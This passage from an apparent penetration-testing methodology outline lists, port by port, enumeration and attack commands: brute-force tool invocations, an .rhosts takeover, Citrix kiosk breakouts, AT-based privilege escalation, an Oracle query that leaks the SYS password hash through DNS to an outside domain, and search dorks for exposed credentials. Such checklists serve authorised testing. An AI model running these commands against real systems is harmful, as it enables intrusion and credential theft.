12.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
12.14.2. ldap brute force
12.14.2.1. bf_ldap
12.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
12.14.2.2. K0ldS
12.14.2.3. LDAP_Brute.pl
12.14.3. Examine Configuration Files
12.14.3.1. General
12.14.3.1.1. containers.ldif
12.14.3.1.2. ldap.cfg
12.14.3.1.3. ldap.conf
12.14.3.1.4. ldap.xml
12.14.3.1.5. ldap-config.xml
12.14.3.1.6. ldap-realm.xml
12.14.3.1.7. slapd.conf
12.14.3.2. IBM SecureWay V3 server
12.14.3.2.1. V3.sas.oc
12.14.3.3. Microsoft Active Directory server
12.14.3.3.1. msadClassesAttrs.ldif
12.14.3.4. Netscape Directory Server 4
12.14.3.4.1. nsslapd.sas_at.conf
12.14.3.4.2. nsslapd.sas_oc.conf
12.14.3.5. OpenLDAP directory server
12.14.3.5.1. slapd.sas_at.conf
12.14.3.5.2. slapd.sas_oc.conf
12.14.3.6. Sun ONE Directory Server 5.1
12.14.3.6.1. 75sas.ldif
12.15. PPTP/L2TP/VPN port 500/1723 open
12.15.1. Enumeration
12.15.1.1. ike-scan
12.15.1.2. ike-probe
12.15.2. Brute-Force
12.15.2.1. ike-crack
12.15.3. Reference Material
12.15.3.1. PSK cracking paper
12.15.3.2. SecurityFocus Infocus
12.15.3.3. Scanning a VPN Implementation
12.16. Modbus port 502 open
12.16.1. modscan
12.17. rlogin port 513 open
12.17.1. Rlogin Enumeration
12.17.1.1. Find the files
12.17.1.1.1. find / -name .rhosts
12.17.1.1.2. locate .rhosts
12.17.1.2. Examine Files
12.17.1.2.1. cat .rhosts
12.17.1.3. Manual Login
12.17.1.3.1. rlogin hostname -l username
12.17.1.3.2. rlogin <IP>
12.17.1.4. Subvert the files
12.17.1.4.1. echo ++ > .rhosts
12.17.2. Rlogin Brute force
12.17.2.1. Hydra
12.18. rsh port 514 open
12.18.1. Rsh Enumeration
12.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
12.18.2. Rsh Brute Force
12.18.2.1. rsh-grind
12.18.2.2. Hydra
12.18.2.3. medusa
12.19. SQL Server Port 1433 1434 open
12.19.1. SQL Enumeration
12.19.1.1. piggy
12.19.1.2. SQLPing
12.19.1.2.1. sqlping ip_address/hostname
12.19.1.3. SQLPing2
12.19.1.4. SQLPing3
12.19.1.5. SQLpoke
12.19.1.6. SQL Recon
12.19.1.7. SQLver
12.19.2. SQL Brute Force
12.19.2.1. SQLPAT
12.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
12.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
12.19.2.2. SQL Dict
12.19.2.3. SQLAT
12.19.2.4. Hydra
12.19.2.5. SQLlhf
12.19.2.6. ForceSQL
12.20. Citrix port 1494 open
12.20.1. Citrix Enumeration
12.20.1.1. Default Domain
12.20.1.2. Published Applications
12.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
12.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
12.20.2. Citrix Brute Force
12.20.2.1. bforce.js
12.20.2.2. connect.js
12.20.2.3. Citrix Brute-forcer
12.20.2.4. Reference Material
12.20.2.4.1. Hacking Citrix - the legitimate backdoor
12.20.2.4.2. Hacking Citrix - the forceful way
12.21. Oracle Port 1521 Open
12.21.1. Oracle Enumeration
12.21.1.1. oracsec
12.21.1.2. Repscan
12.21.1.3. Sidguess
12.21.1.4. Scuba
12.21.1.5. DNS/HTTP Enumeration
12.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
12.21.1.5.2. Untitled
12.21.1.6. WinSID
12.21.1.7. Oracle default password list
12.21.1.8. TNSVer
12.21.1.8.1. tnsver host [port]
12.21.1.9. TCP Scan
12.21.1.10. Oracle TNSLSNR
12.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
12.21.1.11. TNSCmd
12.21.1.11.1. perl tnscmd.pl -h ip_address
12.21.1.11.2. perl tnscmd.pl version -h ip_address
12.21.1.11.3. perl tnscmd.pl status -h ip_address
12.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
12.21.1.12. LSNrCheck
12.21.1.13. Oracle Security Check (needs credentials)
12.21.1.14. OAT
12.21.1.14.1. sh opwg.sh -s ip_address
12.21.1.14.2. opwg.bat -s ip_address
12.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
12.21.1.15. OScanner
12.21.1.15.1. sh oscanner.sh -s ip_address
12.21.1.15.2. oscanner.exe -s ip_address
12.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
12.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
12.21.1.16. NGS Squirrel for Oracle
12.21.1.17. Service Register
12.21.1.17.1. Service-register.exe ip_address
12.21.1.18. PLSQL Scanner 2008
12.21.2. Oracle Brute Force
12.21.2.1. OAK
12.21.2.1.1. ora-getsid hostname port sid_dictionary_list
12.21.2.1.2. ora-auth-alter-session host port sid username password sql
12.21.2.1.3. ora-brutesid host port start
12.21.2.1.4. ora-pwdbrute host port sid username password-file
12.21.2.1.5. ora-userenum host port sid userlistfile
12.21.2.1.6. ora-ver -e (-f -l -a) host port
12.21.2.2. breakable (Targets Application Server Port)
12.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
12.21.2.3. SQLInjector (Targets Application Server Port)
12.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
12.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
12.21.2.4. Check Password
12.21.2.5. orabf
12.21.2.5.1. orabf [hash]:[username] [options]
12.21.2.6. thc-orakel
12.21.2.6.1. Cracker
12.21.2.6.2. Client
12.21.2.6.3. Crypto
12.21.2.7. DBVisualisor
12.21.2.7.1. Sql scripts from pentest.co.uk
12.21.2.7.2. Manual sql input of previously reported vulnerabilties
12.21.3. Oracle Reference Material
12.21.3.1. Understanding SQL Injection
12.21.3.2. SQL Injection walkthrough
12.21.3.3. SQL Injection by example
12.21.3.4. Advanced SQL Injection in Oracle databases
12.21.3.5. Blind SQL Injection
12.21.3.6. SQL Cheatsheets
12.21.3.6.1. Untitled
12.22. NFS Port 2049 open
12.22.1. NFS Enumeration
12.22.1.1. showmount -e hostname/ip_address
12.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
12.22.2. NFS Brute Force
12.22.2.1. Interact with NFS share and try to add/delete
12.22.2.2. Exploit and Confuse Unix
12.22.3. Examine Configuration Files
12.22.3.1. /etc/exports
12.22.3.2. /etc/lib/nfs/xtab
12.22.4. nmap nse script
12.22.4.1. nfs-showmount
12.23. Compaq/HP Insight Manager Port 2301,2381open
12.23.1. HP Enumeration
12.23.1.1. Authentication Method
12.23.1.1.1. Host OS Authentication
12.23.1.1.2. Default Authentication
12.23.1.2. Wikto
12.23.1.3. Nstealth
12.23.2. HP Bruteforce
12.23.2.1. Hydra
12.23.2.2. Acunetix
12.23.3. Examine Configuration Files
12.23.3.1. path.properties
12.23.3.2. mx.log
12.23.3.3. CLIClientConfig.cfg
12.23.3.4. database.props
12.23.3.5. pg_hba.conf
12.23.3.6. jboss-service.xml
12.23.3.7. .namazurc
12.24. MySQL port 3306 open
12.24.1. Enumeration
12.24.1.1. nmap -A -n -p3306 <IP Address>
12.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
12.24.1.3. telnet IP_Address 3306
12.24.1.4. use test; select * from test;
12.24.1.5. To check for other DB's -- show databases
12.24.2. Administration
12.24.2.1. MySQL Network Scanner
12.24.2.2. MySQL GUI Tools
12.24.2.3. mysqlshow
12.24.2.4. mysqlbinlog
12.24.3. Manual Checks
12.24.3.1. Default usernames and passwords
12.24.3.1.1. username: root password:
12.24.3.1.2. testing
12.24.3.2. Configuration Files
12.24.3.2.1. Operating System
12.24.3.2.2. Command History
12.24.3.2.3. Log Files
12.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
12.24.3.2.5. MySQL data directory (Location specified in my.cnf)
12.24.3.2.6. SSL Check
12.24.3.3. Privilege Escalation
12.24.3.3.1. Current Level of access
12.24.3.3.2. Access passwords
12.24.3.3.3. Create a new user and grant him privileges
12.24.3.3.4. Break into a shell
12.24.4. SQL injection
12.24.4.1. mysql-miner.pl
12.24.4.1.1. mysql-miner.pl http://target/ expected_string database
12.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
12.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
12.24.5. References.
12.24.5.1. Design Weaknesses
12.24.5.1.1. MySQL running as root
12.24.5.1.2. Exposed publicly on Internet
12.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
12.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
12.25. RDesktop port 3389 open
12.25.1. Rdesktop Enumeration
12.25.1.1. Remote Desktop Connection
12.25.2. Rdestop Bruteforce
12.25.2.1. TSGrinder
12.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
12.25.2.2. Tscrack
12.26. Sybase Port 5000+ open
12.26.1. Sybase Enumeration
12.26.1.1. sybase-version ip_address from NGS
12.26.2. Sybase Vulnerability Assessment
12.26.2.1. Use DBVisualiser
12.26.2.1.1. Sybase Security checksheet
12.26.2.1.2. Manual sql input of previously reported vulnerabilties
12.26.2.2. NGS Squirrel for Sybase
12.27. SIP Port 5060 open
12.27.1. SIP Enumeration
12.27.1.1. netcat
12.27.1.1.1. nc IP_Address Port
12.27.1.2. sipflanker
12.27.1.2.1. python sipflanker.py 192.168.1-254
12.27.1.3. Sipscan
12.27.1.4. smap
12.27.1.4.1. smap IP_Address/Subnet_Mask
12.27.1.4.2. smap -o IP_Address/Subnet_Mask
12.27.1.4.3. smap -l IP_Address
12.27.2. SIP Packet Crafting etc.
12.27.2.1. sipsak
12.27.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
12.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain
12.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
12.27.2.2. siprogue
12.27.3. SIP Vulnerability Scanning/ Brute Force
12.27.3.1. tftp bruteforcer
12.27.3.1.1. Default dictionary file
12.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
12.27.3.2. VoIPaudit
12.27.3.3. SiVuS
12.27.4. Examine Configuration Files
12.27.4.1. SIPDefault.cnf
12.27.4.2. asterisk.conf
12.27.4.3. sip.conf
12.27.4.4. phone.conf
12.27.4.5. sip_notify.conf
12.27.4.6. <Ethernet address>.cfg
12.27.4.7. 000000000000.cfg
12.27.4.8. phone1.cfg
12.27.4.9. sip.cfg etc. etc.
12.28. VNC port 5900^ open
12.28.1. VNC Enumeration
12.28.1.1. Scans
12.28.1.1.1. 5900^ for direct access.5800 for HTTP access.
12.28.2. VNC Brute Force
12.28.2.1. Password Attacks
12.28.2.1.1. Remote
12.28.2.1.2. Local
12.28.3. Exmine Configuration Files
12.28.3.1. .vnc
12.28.3.2. /etc/vnc/config
12.28.3.3. $HOME/.vnc/config
12.28.3.4. /etc/sysconfig/vncservers
12.28.3.5. /etc/vnc.conf
12.29. Tor Port 9001, 9030 open
12.29.1. Tor Node Checker
12.29.1.1. Ip Pages
12.29.1.2. Kewlio.net
12.29.2. nmap NSE script
12.30. Jet Direct 9100 open
12.30.1. hijetta
13. X11 port 6000^ open
13.1. X11 Enumeration
13.1.1. List open windows
13.1.2. Authentication Method
13.1.2.1. Xauth
13.1.2.2. Xhost
13.2. X11 Exploitation
13.2.1. xwd
13.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
13.2.2. Keystrokes
13.2.2.1. Received
13.2.2.2. Transmitted
13.2.3. Screenshots
13.2.4. xhost +
13.3. Examine Configuration Files
13.3.1. /etc/Xn.hosts
13.3.2. /usr/lib/X11/xdm
13.3.2.1. Untitled
13.3.3. /usr/lib/X11/xdm/xsession
13.3.4. /usr/lib/X11/xdm/xsession-remote
13.3.5. /usr/lib/X11/xdm/xsession.0
13.3.6. /usr/lib/X11/xdm/xdm-config
13.3.6.1. DisplayManager*authorize:on
14. inurl:Citrix/AccessPlatform/auth/login.aspx
15. Citrix Specific Testing
15.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix
15.2. Enumeration
15.2.1. web search
15.2.1.1. Google (GHDB)
15.2.1.1.1. ext:ica
15.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
15.2.1.1.3. [WFClient] Password= filetype:ica
15.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
15.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
15.2.1.1.6. inurl:/Citrix/Nfuse17/
15.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
15.2.1.2. Google Hacks (Author Discovered)
15.2.1.2.1. filetype:ica Username=
15.2.1.2.2. inurl:/Citrix/AccessPlatform/
15.2.1.2.3. inurl:LogonAgent/Login.asp
15.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp
15.2.1.2.5. inurl:/Citrix/NFuse161/login.asp
15.2.1.2.6. inurl:/Citrix/NFuse16
15.2.1.2.7. inurl:/Citrix/NFuse151/
15.2.1.2.8. allintitle:MetaFrame XP Login
15.2.1.2.9. allintitle:MetaFrame Presentation Server Login
15.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
15.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login
15.2.1.3. Yahoo
15.2.1.3.1. originurlextension:ica
15.2.2. site search
15.2.2.1. Manual
15.2.2.1.1. review web page for useful information
15.2.2.1.2. review source for web page
15.2.3. generic
15.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
15.2.3.2. amap -bqv ip_address port_no.
15.2.4. citrix specific
15.2.4.1. enum.pl
15.2.4.1.1. perl enum.pl ip_address
15.2.4.2. enum.js
15.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address
15.2.4.3. connect.js
15.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application
15.2.4.4. Citrix-pa-scan
15.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
15.2.4.5. pabrute.c
15.2.4.5.1. ./pabrute pubapp list app_list ip_address
15.2.5. Default Ports
15.2.5.1. TCP
15.2.5.1.1. Citrix XML Service
15.2.5.1.2. Advanced Management Console
15.2.5.1.3. Citrix SSL Relay
15.2.5.1.4. ICA sessions
15.2.5.1.5. Server to server
15.2.5.1.6. Management Console to server
15.2.5.1.7. Session Reliability (Auto-reconnect)
15.2.5.1.8. License Management Console
15.2.5.1.9. License server
15.2.5.2. UDP
15.2.5.2.1. Clients to ICA browser service
15.2.5.2.2. Server-to-server
15.2.6. nmap nse scripts
15.2.6.1. citrix-enum-apps
15.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
15.2.6.2. citrix-enum-apps-xml
15.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
15.2.6.3. citrix-enum-servers
15.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
15.2.6.4. citrix-enum-servers-xml
15.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
15.2.6.5. citrix-brute-xml
15.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
15.3. Scanning
15.3.1. Nessus
15.3.1.1. Plugins
15.3.1.1.1. CGI abuses
15.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
15.3.1.1.3. Misc.
15.3.1.1.4. Service Detection
15.3.1.1.5. Web Servers
15.3.1.1.6. Windows
15.3.2. Nikto
15.3.2.1. perl nikto.pl -host ip_address -port port_no.
15.3.2.1.1. Untitled
15.4. Exploitation
15.4.1. Alter default .ica files
15.4.1.1. InitialProgram=cmd.exe
15.4.1.2. InitialProgram=explorer.exe
15.4.2. Enumerate and Connect
15.4.2.1. For applications identified by Citrix-pa-scan
15.4.2.1.1. Pas
15.4.2.2. For published applications with a Citrix client when the master browser is non-public.
15.4.2.2.1. Citrix-pa-proxy
15.4.3. Manual Testing
15.4.3.1. Create Batch File (cmd.bat)
15.4.3.1.1. 1
15.4.3.1.2. 2
15.4.3.2. Host Scripting File (cmd.vbs)
15.4.3.2.1. Option Explicit
15.4.3.2.2. Dim objShell
15.4.3.2.3. objShell.Run "%comspec% /k"
15.4.3.2.4. WScript.Quit
15.4.3.2.5. alternative functionality
15.4.3.3. iKat
15.4.3.3.1. Integrated Kiosk Attack Tool
15.4.3.4. AT Command - priviledge escalation
15.4.3.4.1. AT HH:MM /interactive "cmd.exe"
15.4.3.4.2. AT HH:MM /interactive %comspec% /k
15.4.3.4.3. Untitled
15.4.3.5. Keyboard Shortcuts/ Hotkeys
15.4.3.5.1. Ctrl + h – View History
15.4.3.5.2. Ctrl + n – New Browser
15.4.3.5.3. Shift + Left Click – New Browser
15.4.3.5.4. Ctrl + o – Internet Address (browse feature)
15.4.3.5.5. Ctrl + p – Print (to file)
15.4.3.5.6. Right Click (Shift + F10)
15.4.3.5.7. F1 – Jump to URL
15.4.3.5.8. SHIFT+F1: Local Task List
15.4.3.5.9. SHIFT+F2: Toggle Title Bar
15.4.3.5.10. SHIFT+F3: Close Remote Application
15.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
15.4.3.5.12. CTRL+F2: Remote Task List
15.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
15.4.3.5.14. ALT+F2: Cycle through programs
15.4.3.5.15. ALT+PLUS: Alt+TAB
15.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
15.5. Brute Force
15.5.1. bforce.js
15.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
15.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
15.5.1.3. Untitled
15.6. Review Configuration Files
15.6.1. Application server configuration file
15.6.1.1. appsrv.ini
15.6.1.1.1. Location
15.6.1.1.2. World writeable
15.6.1.1.3. Review other files
15.6.1.1.4. Sample file
15.6.2. Program Neighborhood configuration file
15.6.2.1. pn.ini
15.6.2.1.1. Location
15.6.2.1.2. Review other files
15.6.2.1.3. Sample file
15.6.3. Citrix ICA client configuration file
15.6.3.1. wfclient.ini
15.6.3.1.1. Location
15.7. References
15.7.1. Vulnerabilities
15.7.1.1. Art of Hacking
15.7.1.2. Common Vulnerabilities and Exploits (CVE)
15.7.1.2.1. Sample file
15.7.1.2.2. Untitled
15.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
15.7.1.3. OSVDB
15.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
15.7.1.4. Secunia
15.7.1.5. Security-database.com
15.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
15.7.1.6. SecurityFocus
15.7.2. Support
15.7.2.1. Citrix
15.7.2.1.1. Knowledge Base
15.7.2.2. Thinworld
15.7.3. Exploits
15.7.3.1. Milw0rm
15.7.3.1.1. http://www.milw0rm.com/search.php
15.7.3.2. Art of Hacking
15.7.3.2.1. Citrix
15.7.4. Tools Resource
15.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access
16. Network Backbone
16.1. Generic Toolset
16.1.1. Wireshark (Formerly Ethereal)
16.1.1.1. Passive Sniffing
16.1.1.1.1. Usernames/Passwords
16.1.1.1.2. Email
16.1.1.1.3. FTP
16.1.1.1.4. HTTP
16.1.1.1.5. HTTPS
16.1.1.1.6. RDP
16.1.1.1.7. VOIP
16.1.1.1.8. Other
16.1.1.2. Filters
16.1.1.2.1. ip.src == ip_address
16.1.1.2.2. ip.dst == ip_address
16.1.1.2.3. tcp.dstport == port_no.
16.1.1.2.4. ! ip.addr == ip_address
16.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
16.1.2. Cain & Abel
16.1.2.1. Active Sniffing
16.1.2.1.1. ARP Cache Poisoning
16.1.2.1.2. DNS Poisoning
16.1.2.1.3. Routing Protocols
16.1.3. Cisco-Torch
16.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
16.1.4. NTP-Fingerprint
16.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
16.1.5. Yersinia
16.1.6. p0f
16.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
16.1.7. Manual Check (Credentials required)
16.1.8. MAC Spoofing
16.1.8.1. mac address changer for windows
16.1.8.2. macchanger
16.1.8.2.1. Random Mac Address:- macchanger -r eth0
16.1.8.3. madmacs
16.1.8.4. smac
16.1.8.5. TMAC
17. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
17.1. Password Attacks
17.1.1. Known Accounts
17.1.1.1. Identified Passwords
17.1.1.2. Unidentified Hashes
17.1.2. Default Accounts
17.1.2.1. Identified Passwords
17.1.2.2. Unidentified Hashes
17.2. Exploits
17.2.1. Successful Exploits
17.2.1.1. Accounts
17.2.1.1.1. Passwords
17.2.1.1.2. Groups
17.2.1.1.3. Other Details
17.2.1.2. Services
17.2.1.3. Backdoor
17.2.1.4. Connectivity
17.2.2. Unsuccessful Exploits
17.2.3. Resources
17.2.3.1. Securiteam
17.2.3.1.1. Exploits are sorted by year and must be downloaded individually
17.2.3.2. SecurityForest
17.2.3.2.1. Updated via CVS after initial install
17.2.3.3. GovernmentSecurity
17.2.3.3.1. Need to create and account to obtain access
17.2.3.4. Red Base Security
17.2.3.4.1. Oracle Exploit site only
17.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
17.2.3.5.1. Wireless Exploit Site
17.2.3.6. PacketStorm Security
17.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
17.2.3.7. SecWatch
17.2.3.7.1. Exploits sorted by year and month, download seperately
17.2.3.8. SecurityFocus
17.2.3.8.1. Exploits must be downloaded individually
17.2.3.9. Metasploit
17.2.3.9.1. Install and regualrly update via svn
17.2.3.10. Milw0rm
17.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!
17.3. Tools
17.3.1. Metasploit
17.3.1.1. Free Extra Modules
17.3.1.1.1. local copy
17.3.2. Manual SQL Injection
17.3.2.1. Understanding SQL Injection
17.3.2.2. SQL Injection walkthrough
17.3.2.3. SQL Injection by example
17.3.2.4. Blind SQL Injection
17.3.2.5. Advanced SQL Injection in SQL Server
17.3.2.6. More Advanced SQL Injection
17.3.2.7. Advanced SQL Injection in Oracle databases
17.3.2.8. SQL Cheatsheets
17.3.2.8.1. Untitled
17.3.3. SQL Power Injector
17.3.4. SecurityForest
17.3.5. SPI Dynamics WebInspect
17.3.6. Core Impact
17.3.7. Cisco Global Exploiter
17.3.8. PIXDos
17.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
17.3.9. CANVAS
17.3.10. Inguma
18. Contributors
18.1. Matt Byrne (WirelessDefence.org)
18.1.1. Matt contributed the majority of the Wireless section.
18.2. Arvind Doraiswamy (Paladion.net)
18.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
18.3. Lee Lawson (Dns.co.uk)
18.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.
18.4. Nabil OUCHN (Security-database.com)
19. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
19.1. Manual
19.1.1. Patch Levels
19.1.2. Confirmed Vulnerabilities
19.1.2.1. Severe
19.1.2.2. High
19.1.2.3. Medium
19.1.2.4. Low
19.2. Automated
19.2.1. Reports
19.2.2. Vulnerabilities
19.2.2.1. Severe
19.2.2.2. High
19.2.2.3. Medium
19.2.2.4. Low
19.3. Tools
19.3.1. GFI
19.3.2. Nessus (Linux)
19.3.2.1. Nessus (Windows)
19.3.3. NGS Typhon
19.3.4. NGS Squirrel for Oracle
19.3.5. NGS Squirrel for SQL
19.3.6. SARA
19.3.7. MatriXay
19.3.8. BiDiBlah
19.3.9. SSA
19.3.10. Oval Interpreter
19.3.11. Xscan
19.3.12. Security Manager +
19.3.13. Inguma
19.4. Resources
19.4.1. Security Focus
19.4.2. Microsoft Security Bulletin
19.4.3. Common Vulnerabilities and Exploits (CVE)
19.4.4. National Vulnerability Database (NVD)
19.4.5. The Open Source Vulnerability Database (OSVDB)
19.4.5.1. Standalone Database
19.4.5.1.1. Update URL
19.4.6. United States Computer Emergency Response Team (US-CERT)
19.4.7. Computer Emergency Response Team
19.4.8. Mozilla Security Information
19.4.9. SANS
19.4.10. Securiteam
19.4.11. PacketStorm Security
19.4.12. Security Tracker
19.4.13. Secunia
19.4.14. Vulnerabilities.org
19.4.15. ntbugtraq
19.4.16. Wireless Vulnerabilities and Exploits (WVE)
19.5. Blogs
19.5.1. Carnal0wnage
19.5.2. Fsecure Blog
19.5.3. g0ne blog
19.5.4. GNUCitizen
19.5.5. ha.ckers Blog
19.5.6. Jeremiah Grossman Blog
19.5.7. Metasploit
19.5.8. nCircle Blogs
19.5.9. pentest mokney.net
19.5.10. Rational Security
19.5.11. Rational Security
19.5.12. Rise Security
19.5.13. Security Fix Blog
19.5.14. Software Vulnerability Exploitation Blog
19.5.15. Software Vulnerability Exploitation Blog
19.5.16. Taosecurity Blog
20. AS/400 Auditing
20.1. Remote
20.1.1. Information Gathering
20.1.1.1. Nmap using common iSeries (AS/400) services.
20.1.1.1.1. Unsecured services (Port;name;description)
20.1.1.1.2. Secured services (Port;name;description)
20.1.1.2. NetCat (old school technique)
20.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
20.1.1.3. Banners Grabbing
20.1.1.3.1. Telnet
20.1.1.3.2. FTP
20.1.1.3.3. HTTP Banner
20.1.1.3.4. POP3
20.1.1.3.5. SNMP
20.1.1.3.6. SMTP
20.1.2. Users Enumeration
20.1.2.1. Default AS/400 users accounts
20.1.2.2. Error messages
20.1.2.2.1. Telnet Login errors
20.1.2.2.2. POP3 authentication Errors
20.1.2.3. Qsys symbolic link (if ftp is enabled)
20.1.2.3.1. ftp target | quote stat | quote site namefmt 1
20.1.2.3.2. cd /
20.1.2.3.3. quote site listfmt 1
20.1.2.3.4. mkdir temp
20.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
20.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
20.1.2.3.7. dir /temp/qsys/*.usrprf
20.1.2.4. LDAP
20.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
20.1.2.4.2. Tool to browse LDAP
20.1.3. Exploitation
20.1.3.1. CVE References
20.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
20.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
20.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
20.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
20.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
20.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
20.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
20.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
20.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
20.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
